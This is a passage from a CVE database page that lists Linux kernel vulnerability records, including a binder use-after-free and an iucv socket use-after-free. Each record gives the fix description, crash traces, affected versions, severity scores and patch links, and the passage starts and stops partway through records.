                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot\n\nCommit 272970be3dab (\"Bluetooth: hci_qca: Fix driver shutdown on closed\nserdev\") will cause below regression issue:\n\nBT can\u0027t be enabled after below steps:\ncold boot -\u003e enable BT -\u003e disable BT -\u003e warm reboot -\u003e BT enable failure\nif property enable-gpios is not configured within DT|ACPI for QCA6390.\n\nThe commit is to fix a use-after-free issue within qca_serdev_shutdown()\nby adding condition to avoid the serdev is flushed or wrote after closed\nbut also introduces this regression issue regarding above steps since the\nVSC is not sent to reset controller during warm reboot.\n\nFixed by sending the VSC to reset controller within qca_serdev_shutdown()\nonce BT was ever enabled, and the use-after-free issue is also fixed by\nthis change since the serdev is still opened before it is flushed or wrote.\n\nVerified by the reported machine Dell XPS 13 9310 laptop over below two\nkernel commits:\ncommit e00fc2700a3f (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of bluetooth-next tree.\ncommit b23d98d46d28 (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of linus mainline tree."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:23:54.718Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
        },
        {
          "url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
        }
      ],
      "title": "Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42137",
    "datePublished": "2024-07-30T07:46:31.748Z",
    "dateReserved": "2024-07-29T15:50:41.188Z",
    "dateUpdated": "2025-11-03T22:02:05.374Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46740 (GCVE-0-2024-46740)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:17

Title

binder: fix UAF caused by offsets overwrite

Summary

In the Linux kernel, the following vulnerability has been resolved: binder: fix UAF caused by offsets overwrite Binder objects are processed and copied individually into the target buffer during transactions. Any raw data in-between these objects is copied as well. However, this raw data copy lacks an out-of-bounds check. If the raw data exceeds the data section size then the copy overwrites the offsets section. This eventually triggers an error that attempts to unwind the processed objects. However, at this point the offsets used to index these objects are now corrupted. Unwinding with corrupted offsets can result in decrements of arbitrary nodes and lead to their premature release. Other users of such nodes are left with a dangling pointer triggering a use-after-free. This issue is made evident by the following KASAN report (trimmed): ================================================================== BUG: KASAN: slab-use-after-free in _raw_spin_lock+0xe4/0x19c Write of size 4 at addr ffff47fc91598f04 by task binder-util/743 CPU: 9 UID: 0 PID: 743 Comm: binder-util Not tainted 6.11.0-rc4 #1 Hardware name: linux,dummy-virt (DT) Call trace: _raw_spin_lock+0xe4/0x19c binder_free_buf+0x128/0x434 binder_thread_write+0x8a4/0x3260 binder_ioctl+0x18f0/0x258c [...] Allocated by task 743: __kmalloc_cache_noprof+0x110/0x270 binder_new_node+0x50/0x700 binder_transaction+0x413c/0x6da8 binder_thread_write+0x978/0x3260 binder_ioctl+0x18f0/0x258c [...] Freed by task 745: kfree+0xbc/0x208 binder_thread_read+0x1c5c/0x37d4 binder_ioctl+0x16d8/0x258c [...] ================================================================== To avoid this issue, let's check that the raw data copy is within the boundaries of the data section.

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5a32bfd23022ffa7e…
	https://git.kernel.org/stable/c/3a8154bb4ab4a0139…
	https://git.kernel.org/stable/c/eef79854a04feac5b…
	https://git.kernel.org/stable/c/4f79e0b80dc69bd5e…
	https://git.kernel.org/stable/c/1f33d9f1d9ac3f012…
	https://git.kernel.org/stable/c/109e845c1184c9f78…
	https://git.kernel.org/stable/c/4df153652cc465457…

Impacted products

Vendor

Product

Version

Linux

Affected: c056a6ba35e00ae943e377eb09abd77a6915b31a , < 5a32bfd23022ffa7e152f273fa3fa29befb7d929 (git)
Affected: 23e9d815fad84c1bee3742a8de4bd39510435362 , < 3a8154bb4ab4a01390a3abf1e6afac296e037da4 (git)
Affected: 7a9ad4aceb0226b391c9d3b8e4ac2e7d438b6bde , < eef79854a04feac5b861f94d7b19cbbe79874117 (git)
Affected: 6d98eb95b450a75adb4516a1d33652dc78d2b20c , < 4f79e0b80dc69bd5eaaed70f0df1b558728b4e59 (git)
Affected: 6d98eb95b450a75adb4516a1d33652dc78d2b20c , < 1f33d9f1d9ac3f0129f8508925000900c2fe5bb0 (git)
Affected: 6d98eb95b450a75adb4516a1d33652dc78d2b20c , < 109e845c1184c9f786d41516348ba3efd9112792 (git)
Affected: 6d98eb95b450a75adb4516a1d33652dc78d2b20c , < 4df153652cc46545722879415937582028c18af5 (git)
Affected: 66e12f5b3a9733f941893a00753b10498724607d (git)

Linux

Affected: 5.17
Unaffected: 0 , < 5.17 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46740",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-18T15:46:39.032275Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-18T15:56:06.412Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:29.741Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/android/binder.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5a32bfd23022ffa7e152f273fa3fa29befb7d929",
              "status": "affected",
              "version": "c056a6ba35e00ae943e377eb09abd77a6915b31a",
              "versionType": "git"
            },
            {
              "lessThan": "3a8154bb4ab4a01390a3abf1e6afac296e037da4",
              "status": "affected",
              "version": "23e9d815fad84c1bee3742a8de4bd39510435362",
              "versionType": "git"
            },
            {
              "lessThan": "eef79854a04feac5b861f94d7b19cbbe79874117",
              "status": "affected",
              "version": "7a9ad4aceb0226b391c9d3b8e4ac2e7d438b6bde",
              "versionType": "git"
            },
            {
              "lessThan": "4f79e0b80dc69bd5eaaed70f0df1b558728b4e59",
              "status": "affected",
              "version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
              "versionType": "git"
            },
            {
              "lessThan": "1f33d9f1d9ac3f0129f8508925000900c2fe5bb0",
              "status": "affected",
              "version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
              "versionType": "git"
            },
            {
              "lessThan": "109e845c1184c9f786d41516348ba3efd9112792",
              "status": "affected",
              "version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
              "versionType": "git"
            },
            {
              "lessThan": "4df153652cc46545722879415937582028c18af5",
              "status": "affected",
              "version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "66e12f5b3a9733f941893a00753b10498724607d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/android/binder.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.17"
            },
            {
              "lessThan": "5.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "5.4.226",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.10.157",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.15.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.16.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix UAF caused by offsets overwrite\n\nBinder objects are processed and copied individually into the target\nbuffer during transactions. Any raw data in-between these objects is\ncopied as well. However, this raw data copy lacks an out-of-bounds\ncheck. If the raw data exceeds the data section size then the copy\noverwrites the offsets section. This eventually triggers an error that\nattempts to unwind the processed objects. However, at this point the\noffsets used to index these objects are now corrupted.\n\nUnwinding with corrupted offsets can result in decrements of arbitrary\nnodes and lead to their premature release. Other users of such nodes are\nleft with a dangling pointer triggering a use-after-free. This issue is\nmade evident by the following KASAN report (trimmed):\n\n  ==================================================================\n  BUG: KASAN: slab-use-after-free in _raw_spin_lock+0xe4/0x19c\n  Write of size 4 at addr ffff47fc91598f04 by task binder-util/743\n\n  CPU: 9 UID: 0 PID: 743 Comm: binder-util Not tainted 6.11.0-rc4 #1\n  Hardware name: linux,dummy-virt (DT)\n  Call trace:\n   _raw_spin_lock+0xe4/0x19c\n   binder_free_buf+0x128/0x434\n   binder_thread_write+0x8a4/0x3260\n   binder_ioctl+0x18f0/0x258c\n  [...]\n\n  Allocated by task 743:\n   __kmalloc_cache_noprof+0x110/0x270\n   binder_new_node+0x50/0x700\n   binder_transaction+0x413c/0x6da8\n   binder_thread_write+0x978/0x3260\n   binder_ioctl+0x18f0/0x258c\n  [...]\n\n  Freed by task 745:\n   kfree+0xbc/0x208\n   binder_thread_read+0x1c5c/0x37d4\n   binder_ioctl+0x16d8/0x258c\n  [...]\n  ==================================================================\n\nTo avoid this issue, let\u0027s check that the raw data copy is within the\nboundaries of the data section."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:40.676Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5a32bfd23022ffa7e152f273fa3fa29befb7d929"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a8154bb4ab4a01390a3abf1e6afac296e037da4"
        },
        {
          "url": "https://git.kernel.org/stable/c/eef79854a04feac5b861f94d7b19cbbe79874117"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f79e0b80dc69bd5eaaed70f0df1b558728b4e59"
        },
        {
          "url": "https://git.kernel.org/stable/c/1f33d9f1d9ac3f0129f8508925000900c2fe5bb0"
        },
        {
          "url": "https://git.kernel.org/stable/c/109e845c1184c9f786d41516348ba3efd9112792"
        },
        {
          "url": "https://git.kernel.org/stable/c/4df153652cc46545722879415937582028c18af5"
        }
      ],
      "title": "binder: fix UAF caused by offsets overwrite",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46740",
    "datePublished": "2024-09-18T07:12:01.653Z",
    "dateReserved": "2024-09-11T15:12:18.263Z",
    "dateUpdated": "2025-11-03T22:17:29.741Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42271 (GCVE-0-2024-42271)

Vulnerability from cvelistv5 – Published: 2024-08-17 08:54 – Updated: 2025-11-03 22:03

Title

net/iucv: fix use after free in iucv_sock_close()

Summary

In the Linux kernel, the following vulnerability has been resolved: net/iucv: fix use after free in iucv_sock_close() iucv_sever_path() is called from process context and from bh context. iucv->path is used as indicator whether somebody else is taking care of severing the path (or it is already removed / never existed). This needs to be done with atomic compare and swap, otherwise there is a small window where iucv_sock_close() will try to work with a path that has already been severed and freed by iucv_callback_connrej() called by iucv_tasklet_fn(). Example: [452744.123844] Call Trace: [452744.123845] ([<0000001e87f03880>] 0x1e87f03880) [452744.123966] [<00000000d593001e>] iucv_path_sever+0x96/0x138 [452744.124330] [<000003ff801ddbca>] iucv_sever_path+0xc2/0xd0 [af_iucv] [452744.124336] [<000003ff801e01b6>] iucv_sock_close+0xa6/0x310 [af_iucv] [452744.124341] [<000003ff801e08cc>] iucv_sock_release+0x3c/0xd0 [af_iucv] [452744.124345] [<00000000d574794e>] __sock_release+0x5e/0xe8 [452744.124815] [<00000000d5747a0c>] sock_close+0x34/0x48 [452744.124820] [<00000000d5421642>] __fput+0xba/0x268 [452744.124826] [<00000000d51b382c>] task_work_run+0xbc/0xf0 [452744.124832] [<00000000d5145710>] do_notify_resume+0x88/0x90 [452744.124841] [<00000000d5978096>] system_call+0xe2/0x2c8 [452744.125319] Last Breaking-Event-Address: [452744.125321] [<00000000d5930018>] iucv_path_sever+0x90/0x138 [452744.125324] [452744.125325] Kernel panic - not syncing: Fatal exception in interrupt Note that bh_lock_sock() is not serializing the tasklet context against process context, because the check for sock_owned_by_user() and corresponding handling is missing. Ideas for a future clean-up patch: A) Correct usage of bh_lock_sock() in tasklet context, as described in Re-enqueue, if needed. This may require adding return values to the tasklet functions and thus changes to all users of iucv. B) Change iucv tasklet into worker and use only lock_sock() in af_iucv.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/84f40b46787ecb67c…
	https://git.kernel.org/stable/c/37652fbef9809411c…
	https://git.kernel.org/stable/c/c65f72eec60a34ace…
	https://git.kernel.org/stable/c/ac758e1f663fe9bc6…
	https://git.kernel.org/stable/c/8b424c9e44111c5a7…
	https://git.kernel.org/stable/c/01437282fd3904810…
	https://git.kernel.org/stable/c/69620522c48ce8215…
	https://git.kernel.org/stable/c/f558120cd709682b7…

Impacted products

Vendor

Product

Version

Linux

Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < 84f40b46787ecb67c7ad08a5bb1376141fa10c01 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < 37652fbef9809411cea55ea5fa1a170e299efcd0 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < c65f72eec60a34ace031426e04e9aff8e5f04895 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < ac758e1f663fe9bc64f6b47212a2aa18697524f5 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < 8b424c9e44111c5a76f41c6b741f8d4c4179d876 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < 01437282fd3904810603f3dc98d2cac6b8b6fc84 (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < 69620522c48ce8215e5eb55ffbab8cafee8f407d (git)
Affected: 7d316b9453523498246e9e19a659c423d4c5081e , < f558120cd709682b739207b48cf7479fd9568431 (git)

Linux

Affected: 3.4
Unaffected: 0 , < 3.4 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.104 , ≤ 6.1.* (semver)
Unaffected: 6.6.45 , ≤ 6.6.* (semver)
Unaffected: 6.10.4 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42271",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:12:11.442193Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:32.331Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:07.104Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/iucv/af_iucv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "84f40b46787ecb67c7ad08a5bb1376141fa10c01",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "37652fbef9809411cea55ea5fa1a170e299efcd0",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "c65f72eec60a34ace031426e04e9aff8e5f04895",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "ac758e1f663fe9bc64f6b47212a2aa18697524f5",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "8b424c9e44111c5a76f41c6b741f8d4c4179d876",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "01437282fd3904810603f3dc98d2cac6b8b6fc84",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "69620522c48ce8215e5eb55ffbab8cafee8f407d",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            },
            {
              "lessThan": "f558120cd709682b739207b48cf7479fd9568431",
              "status": "affected",
              "version": "7d316b9453523498246e9e19a659c423d4c5081e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/iucv/af_iucv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.4"
            },
            {
              "lessThan": "3.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.104",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.45",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.104",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.45",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.4",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/iucv: fix use after free in iucv_sock_close()\n\niucv_sever_path() is called from process context and from bh context.\niucv-\u003epath is used as indicator whether somebody else is taking care of\nsevering the path (or it is already removed / never existed).\nThis needs to be done with atomic compare and swap, otherwise there is a\nsmall window where iucv_sock_close() will try to work with a path that has\nalready been severed and freed by iucv_callback_connrej() called by\niucv_tasklet_fn().\n\nExample:\n[452744.123844] Call Trace:\n[452744.123845] ([\u003c0000001e87f03880\u003e] 0x1e87f03880)\n[452744.123966]  [\u003c00000000d593001e\u003e] iucv_path_sever+0x96/0x138\n[452744.124330]  [\u003c000003ff801ddbca\u003e] iucv_sever_path+0xc2/0xd0 [af_iucv]\n[452744.124336]  [\u003c000003ff801e01b6\u003e] iucv_sock_close+0xa6/0x310 [af_iucv]\n[452744.124341]  [\u003c000003ff801e08cc\u003e] iucv_sock_release+0x3c/0xd0 [af_iucv]\n[452744.124345]  [\u003c00000000d574794e\u003e] __sock_release+0x5e/0xe8\n[452744.124815]  [\u003c00000000d5747a0c\u003e] sock_close+0x34/0x48\n[452744.124820]  [\u003c00000000d5421642\u003e] __fput+0xba/0x268\n[452744.124826]  [\u003c00000000d51b382c\u003e] task_work_run+0xbc/0xf0\n[452744.124832]  [\u003c00000000d5145710\u003e] do_notify_resume+0x88/0x90\n[452744.124841]  [\u003c00000000d5978096\u003e] system_call+0xe2/0x2c8\n[452744.125319] Last Breaking-Event-Address:\n[452744.125321]  [\u003c00000000d5930018\u003e] iucv_path_sever+0x90/0x138\n[452744.125324]\n[452744.125325] Kernel panic - not syncing: Fatal exception in interrupt\n\nNote that bh_lock_sock() is not serializing the tasklet context against\nprocess context, because the check for sock_owned_by_user() and\ncorresponding handling is missing.\n\nIdeas for a future clean-up patch:\nA) Correct usage of bh_lock_sock() in tasklet context, as described in\nRe-enqueue, if needed. This may require adding return values to the\ntasklet functions and thus changes to all users of iucv.\n\nB) Change iucv tasklet into worker and use only lock_sock() in af_iucv."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:37.701Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/84f40b46787ecb67c7ad08a5bb1376141fa10c01"
        },
        {
          "url": "https://git.kernel.org/stable/c/37652fbef9809411cea55ea5fa1a170e299efcd0"
        },
        {
          "url": "https://git.kernel.org/stable/c/c65f72eec60a34ace031426e04e9aff8e5f04895"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac758e1f663fe9bc64f6b47212a2aa18697524f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b424c9e44111c5a76f41c6b741f8d4c4179d876"
        },
        {
          "url": "https://git.kernel.org/stable/c/01437282fd3904810603f3dc98d2cac6b8b6fc84"
        },
        {
          "url": "https://git.kernel.org/stable/c/69620522c48ce8215e5eb55ffbab8cafee8f407d"
        },
        {
          "url": "https://git.kernel.org/stable/c/f558120cd709682b739207b48cf7479fd9568431"
        }
      ],
      "title": "net/iucv: fix use after free in iucv_sock_close()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42271",
    "datePublished": "2024-08-17T08:54:26.048Z",
    "dateReserved": "2024-07-30T07:40:12.260Z",
    "dateUpdated": "2025-11-03T22:03:07.104Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42088 (GCVE-0-2024-42088)

Vulnerability from cvelistv5 – Published: 2024-07-29 16:26 – Updated: 2025-05-04 09:22

Title

ASoC: mediatek: mt8195: Add platform entry for ETDM1_OUT_BE dai link

Summary

